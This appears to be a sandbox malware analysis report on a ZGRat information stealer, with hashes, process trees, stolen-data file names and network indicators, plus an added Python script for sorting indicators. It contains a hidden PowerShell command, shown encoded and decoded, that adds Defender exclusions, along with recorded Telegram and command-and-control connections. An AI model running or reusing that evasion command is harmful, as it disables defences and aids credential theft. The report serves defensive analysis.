memory/2600-4-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-936-0x0000000002F70000-0x0000000002F71000-memory.dmp

memory/2600-937-0x0000000008E30000-0x0000000009330000-memory.dmp

memory/2600-938-0x0000000006FD0000-0x000000000701C000-memory.dmp

memory/2600-939-0x0000000008190000-0x0000000008734000-memory.dmp

memory/2600-943-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/3764-945-0x0000000000400000-0x0000000000C0A000-memory.dmp

memory/3764-944-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/3764-947-0x0000000005260000-0x0000000005270000-memory.dmp

memory/3764-948-0x00000000052B0000-0x00000000052BA000-memory.dmp

memory/3764-946-0x00000000050C0000-0x0000000005152000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 a90e4f6bdd44a71e2246160693884539
SHA1 940ebec474e0b4d87dc4f06f37a1d32d2315cf56
SHA256 b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4
SHA512 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937

memory/5112-978-0x0000015A3DAD0000-0x0000015A3DC48000-memory.dmp

memory/4924-977-0x00000000008A0000-0x0000000000A32000-memory.dmp

memory/5112-980-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp

memory/4924-982-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/5112-983-0x0000015A58300000-0x0000015A58310000-memory.dmp

memory/3764-981-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/4924-979-0x00000000052E0000-0x0000000005346000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 aeb20a62dc5daec0e2f60165f9829b07
SHA1 fdafa16dfbd0d2d6a1f88add8db1120721edead2
SHA256 08b11f91e2081d5ddf637d64784c4101ec65653d36299a7a22d9b457aae65a14
SHA512 388f9d76bf79d9c5e53a4c994ff9853356b6a0f2c5ef7feae84813f1be1d3a2c09e1838a3286acf980e66a270028595191cd35dd6593a920a8862b3cf10e387b

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 dcf0f2f524e0e1d2752f64dc7fce8ea0
SHA1 4cb2ae016e67f7fa88d9598313f6092fffc55559
SHA256 bf6796861138edc7e2eb7807fd388d91922408853c8dccb495aca889dd2e89b6
SHA512 fea9118e846801b82bb04c057624ab727c3f4116c7c194164da49f6541cfad65daa70e6a5c5dfc8f148e75ac5b96763b18dcf6a427c01fa4f8a7ab2b4aa51330

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(These are the digests of a zero-byte file: this entry records loaderX.exe as created, before the dropper wrote its contents. They are not usable as indicators; the populated copy of the same path is listed separately with its own hashes.)

memory/5112-985-0x0000015A5A390000-0x0000015A5A3E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 6e0741d4586628386a6f1df47a03655e
SHA1 610950a24bb3c8b318130ffb98690ecba89c1018
SHA256 65a5758d31c44e29e26a3444333ed585e13117daed14bff83e33df06ad9133f7
SHA512 4a3e09b6f5c6a33a9c919477b488aef6d3bf18e793fa3ff82dd105015b95ba0cd4451e52fbcf5ff5c9e37bc138856aaa5d83a18529512fdc4794eaff9a401393

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 45ea343e335d2d6400ccbc1e3fc85f11
SHA1 7f2267d1f27a076e284696c30a4cf4768fd1a52f
SHA256 f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203
SHA512 c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1

memory/4924-1018-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/5112-1027-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp

memory/4924-1031-0x00000000058A0000-0x00000000058C6000-memory.dmp

memory/4924-1032-0x00000000058D0000-0x00000000058D8000-memory.dmp

memory/4924-1030-0x0000000005810000-0x00000000058A2000-memory.dmp

memory/4924-1035-0x0000000006820000-0x000000000683E000-memory.dmp

memory/4924-1034-0x0000000006800000-0x0000000006808000-memory.dmp

memory/4924-1033-0x00000000067F0000-0x00000000067FA000-memory.dmp

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

memory/4924-1223-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/4924-1226-0x0000000006C40000-0x0000000006CBA000-memory.dmp

memory/4924-1298-0x0000000007100000-0x00000000071B2000-memory.dmp

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Debug.txt

MD5 e08defb48fa31212026eba24f895a35f
SHA1 c0b9d3c1aec64bf21af878cab77d67999399437d
SHA256 e32ef5b1291cd83151ccce58e0a74f9fc287cbb4276670407972b1f79a2f561e
SHA512 6beb8c75d37b99674e28010cf6f1bc3862632cc299e1a297c0dfcd987771c5f1249d1818b5b0800b30b478fcf6e83392f75436ec186f3d1c73de67974958ff8d

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/4924-1300-0x0000000006B70000-0x0000000006B92000-memory.dmp

memory/4924-1301-0x0000000007FA0000-0x00000000082F4000-memory.dmp

C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\msgid.dat

MD5 c010c7aa7b322c786d79b8846cb067ed
SHA1 fbd6564d70b404df38f7357fc5d1439cd44672a1
SHA256 9fb3307f61d84c4da05cc9e075a5512d168db16bad673994fc44ff8489b22f6e
SHA512 1197fc5a15271d40dc3732e9ffb3dc93e148d5714e18ac66c9af7da52b3005e4ea10b848215e566576f605bd72b43d3b5a8c0d2014396d0d493de40069bb873b

memory/4924-1313-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/4924-1314-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/4924-1315-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

0s

Max time network

94s

Command Line

C:\Windows\system32\OpenWith.exe -Embedding

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Avjteuhlk.dat

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

2s

Max time network

88s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A (32 rule matches; the report records no indicator, process or target for any of them)

ZGRat

rat zgrat

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"

C:\Users\Admin\AppData\Local\Temp\rock.exe

"C:\Users\Admin\AppData\Local\Temp\rock.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
Decoded -enc payload (base64 of UTF-16LE): Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; Add-MpPreference -ExclusionProcess TypeId.exe;

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
Decoded -enc payload (base64 of UTF-16LE): Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; Add-MpPreference -ExclusionProcess TypeId.exe;

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 53.191.33.194.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
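Most rows in these Network tables are the sandbox resolver's reverse lookups of Microsoft and CDN address space, which hide the handful of connections that matter: the ip-api.com geolocation call, the Telegram Bot API session used for exfiltration, the download from magic.poisontoolz.com, and the bare-IP session to port 58001. The following is an added example, not part of the report, that parses rows in the report's own `Country Destination Domain Proto` layout (the Domain column is absent on some rows) and separates resolver noise from the endpoints worth keeping as indicators. The sample rows are copied from the table above; the tag names and the `SERVICE_TAGS` mapping are this example's own.

```python
"""Classify rows of a sandbox 'Network' table (added example)."""
from collections import Counter
from typing import List, NamedTuple, Tuple

# Constructed sample: a subset of the rows above, copied as printed.
SAMPLE_ROWS = """\
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 udp
FR 194.33.191.53:58001 tcp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
FR 194.33.191.53:58001 tcp
"""

# Public services that are harmless on their own but characteristic of
# stealers when a dropped binary contacts them. This mapping is an assumption
# of the example, not something the report states.
SERVICE_TAGS = {
    "ip-api.com": "external_ip_lookup",
    "api.telegram.org": "telegram_bot_api",
}


class Row(NamedTuple):
    country: str
    ip: str
    port: int
    domain: str
    proto: str
    tag: str


def classify(port: int, domain: str, proto: str) -> str:
    """Assign one tag per row; DNS rows are judged by the queried name."""
    if proto == "udp" and port == 53:
        if domain.endswith(".in-addr.arpa"):
            return "dns_ptr_noise"  # reverse lookups made by Windows/sandbox telemetry
        return "dns_query" if domain else "dns_query_unlabelled"
    if domain in SERVICE_TAGS:
        return SERVICE_TAGS[domain]
    if port not in (80, 443):
        return "nonstandard_port"  # bare IP on an odd port: C2 candidate
    return "http_connection" if domain else "http_connection_bare_ip"


def parse_row(line: str) -> Row:
    parts = line.split()
    if len(parts) not in (3, 4):
        raise ValueError(f"unexpected row layout: {line!r}")
    country, dest, proto = parts[0], parts[1], parts[-1]
    domain = parts[2] if len(parts) == 4 else ""
    ip, _, port_s = dest.rpartition(":")
    port = int(port_s)
    return Row(country, ip, port, domain, proto, classify(port, domain, proto))


def parse_table(text: str) -> List[Row]:
    return [parse_row(ln) for ln in text.splitlines() if ln.strip()]


def connection_iocs(rows: List[Row]) -> List[Tuple[Tuple[str, int, str, str], int]]:
    """Unique non-DNS endpoints as (ip, port, domain, tag) with hit counts."""
    counts = Counter(
        (r.ip, r.port, r.domain, r.tag) for r in rows if not r.tag.startswith("dns")
    )
    return sorted(counts.items())


if __name__ == "__main__":
    for (ip, port, domain, tag), n in connection_iocs(parse_table(SAMPLE_ROWS)):
        print(f"{ip}:{port:<6} {domain or '-':<24} {tag:<24} x{n}")
```

The point of the split is that the in-addr.arpa queries should never reach a blocklist: they name Microsoft infrastructure the sandbox itself talks to. The four endpoints that survive the filter are the ones to compare across the other detonations on this page.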

Files

memory/1200-0-0x0000000000E10000-0x0000000001382000-memory.dmp

memory/1200-1-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/1200-2-0x0000000001B80000-0x0000000001B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 b5a9a31834ca48de5da58107f646a2a6
SHA1 18de389616225e3d740d288262a5c5bca5f11fc4
SHA256 52df0926bf74c947e9959bd680421d47dab959a0fa12402127c7eb587b7a1d95
SHA512 eeed1552481a59c748feb68f5d9d701e261d2e4bd250ecb399274b4f5bca8101a35520cf2891447ba3cdded40ceca70e546d3090abd1eaf979c0a16a661c566b

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 69e9f5b9e1c5ef06143471ae6022f996
SHA1 fb74e045c41ef9fa9a11d3ec88ace82bb82f1729
SHA256 70ba794963458cf9a8373869cf91aa234ecbdd596d2069237d1282718c3a68e7
SHA512 57f75155c86a1079bfdc735a96c5ea6438e5227fc4e5b15ebd7fb329929a54e0d434700508700b1083d3fdc08a99b13c4e4cad9e33d621a6a8f4aaaa1272df87

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 6fba0bc9d0671236ec252f7c5b014d57
SHA1 ab4a0d7bd02e3c1d259553085214ae6f5dae3177
SHA256 7c6c4ec6dbd68f2c0947cb46d6d3d4b091321c2209344332b59d97e177b6ca83
SHA512 8b69836353df340a1df412e6e926d41c2e1a9d3cb2ae6cbf751f4d68990f1c92475492aab0ef52e364329303018a4e3999d4cae72de2ae9a13aa9af249783d43

memory/2576-32-0x0000027390990000-0x0000027390B08000-memory.dmp

memory/1200-34-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/2576-33-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/3892-36-0x0000000000B80000-0x0000000000C1C000-memory.dmp

memory/3892-35-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 e483b733c95b33af0dc4257eeaf24ff2
SHA1 8e51b0545596abb59361dd71999524eebd481908
SHA256 562bfea0a5e27bb37cfdcf26397989d7a1b48ee34dbe0ceeaf50c2a5b110791f
SHA512 8db7cc418ffea771f6937e326bec01f86a48ddd1019998e6217d2d0cc532301b33a0a05aa6b377c7b9e549093dd95ca69a8bce9728223e8bb055d2d1ee640f83

memory/2576-37-0x00000273AB170000-0x00000273AB180000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 21656b2a4a4b65faff027532bd7f1504
SHA1 957cf154d9447d2bb1498fab227b0ced0bf65d2c
SHA256 49e25464f406c4df62df2ef15bebc68f36058d0feb9fae1ff60d6441d2528b36
SHA512 7980929460c9d0d4eb453571b201b08e9db272b4bc3dad242b6d66cd4db066253bf25f6e1678094d170f24295c8eb5c9cf9930c5395e22fd15b102219541db91

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 c1fcd3f9800bbfb95a0e9c2cb7ca20b2
SHA1 c65076ad5f65b7fe8e72cf7db2d0da7fe6d16d53
SHA256 1b297af1fd0406ddf9f645636db79438761650b3d03adba24c2739d137fcaf14
SHA512 4867f657c6d060308364310dc53eaad7835f8721cac5f1eaa965716859d5293aca31ed0bd55fa3266c76ad8298a872fa96e2717440438ec533d65072b82b31ce

memory/3892-38-0x0000000005490000-0x00000000054A0000-memory.dmp

memory/3892-39-0x00000000054A0000-0x0000000005588000-memory.dmp

memory/3892-41-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-43-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-52-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-58-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-60-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-64-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-70-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/2576-73-0x00000273AB100000-0x00000273AB150000-memory.dmp

memory/3892-75-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-82-0x00000000054A0000-0x0000000005582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt

MD5 36f6acc2229073f5bb4074cee73d1d5b
SHA1 b2adbb44350d984dff40c15fcbbeb3379c7ec0e5
SHA256 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35
SHA512 da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad

memory/3892-115-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-121-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-127-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-135-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-137-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-133-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-131-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-129-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-125-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-123-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-119-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-117-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-113-0x00000000054A0000-0x0000000005582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt

MD5 6be6fdca0cfa94635b8689b2b0bf2bee
SHA1 379c61029b5443c3d3df7c770423e40618b36d15
SHA256 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA512 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8

memory/3892-90-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-72-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-68-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-66-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-62-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-56-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-54-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-50-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-48-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-46-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-40-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/2576-463-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/3892-2288-0x0000000005690000-0x00000000056DC000-memory.dmp

memory/3892-2287-0x0000000005630000-0x0000000005686000-memory.dmp

memory/3892-2289-0x0000000005850000-0x00000000058B6000-memory.dmp

memory/3892-2290-0x0000000005C70000-0x0000000005CC4000-memory.dmp

memory/3892-2293-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2168-2296-0x0000020630B40000-0x0000020630B50000-memory.dmp

memory/2168-2306-0x00000206490D0000-0x00000206490F2000-memory.dmp

memory/2168-2307-0x0000020630B40000-0x0000020630B50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joffblep.we4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2168-2295-0x0000020630B40000-0x0000020630B50000-memory.dmp

memory/2168-2294-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

memory/2168-2310-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

MD5 b436f694b4f5182e9f31c4eae47bb0fb
SHA1 3d0d136ec3e24c2dbc205b71770c6125effc8936
SHA256 08206dcfb5782fa050ae2462abc8076fe4a72defb96db46c8bde9f6295746e79
SHA512 7e2cda355d78dfe8f23a6709967c327f871628e6f9cff879d32adcd58dfde62963eca1c04cb442fd548ccc67b444b8a9329617d775504c3654c5910e12f7cfc9

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

MD5 06bf68af8360c9c6fe3ebd5f59c03495
SHA1 9149177f83ff4da16ab8bb9b77c94e5b55f3b454
SHA256 fd9fd323b5934ecfc817a62a688a428bae61bbc80a12e43fe20637e9bfc47a50
SHA512 95435c8c23b7c295fd08a0cd200c95d29183e5675a71f32ba6a6feba8bbee2ec8657d7364c97a46f6bf3fed404732898720768a56a48ece29ad8cd5b64266915

memory/3984-2314-0x0000000002930000-0x0000000002940000-memory.dmp

memory/3984-2313-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2960-4522-0x0000000005490000-0x00000000054A0000-memory.dmp

memory/3984-4523-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2960-4521-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1148-5654-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

memory/1148-5656-0x0000028263D40000-0x0000028263D50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

